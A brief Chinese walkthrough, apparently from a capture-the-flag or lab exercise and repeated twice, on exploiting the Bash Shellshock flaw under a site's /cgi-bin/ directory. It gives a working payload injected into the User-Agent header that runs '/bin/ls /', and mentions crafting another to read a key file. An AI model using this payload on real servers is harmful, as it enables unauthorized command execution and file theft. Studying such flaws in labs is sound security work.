Bash远程命令执行漏洞存在于网站的/cgi-bin/目录下;
抓包后在HTTP请求中插入poc;
poc:
User-Agent: () { :;}; echo; /bin/ls /
再构造poc能够查看key文件;
漏洞详情:
https://www.freebuf.com/vuls/44994.html
Bash远程命令执行漏洞存在于网站的/cgi-bin/目录下;
抓包后在HTTP请求中插入poc;
poc:
User-Agent: () { :;}; echo; /bin/ls /
再构造poc能够查看key文件;
漏洞详情:
https://www.freebuf.com/vuls/44994.html